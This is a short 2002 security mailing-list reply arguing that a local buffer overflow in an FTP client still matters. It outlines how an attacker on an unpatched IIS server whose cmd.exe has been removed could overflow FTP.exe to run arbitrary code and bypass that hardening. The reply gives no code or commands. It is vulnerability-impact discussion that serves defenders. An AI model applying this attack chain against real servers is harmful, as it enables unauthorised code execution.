RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote?

From: Brett Moore (brettat_private)
Date: Sun May 05 2002 - 17:47:42 PDT

    Hi.

    You said.
    "This is a client-side bug the client themselves would have to exploit
    making it irrelevent."

    Think about this, because I do.

    IIS server, unpatched for unicode (or similar/ new variant). The server has
    had the cmd.exe renamed/removed/acl protected therefore preventing command
    execution.

    But they forgot FTP.exe so we bof the ftp client and inject and run any code
    we like therefore bypassing the 'protection' given by removing cmd.exe

    Brett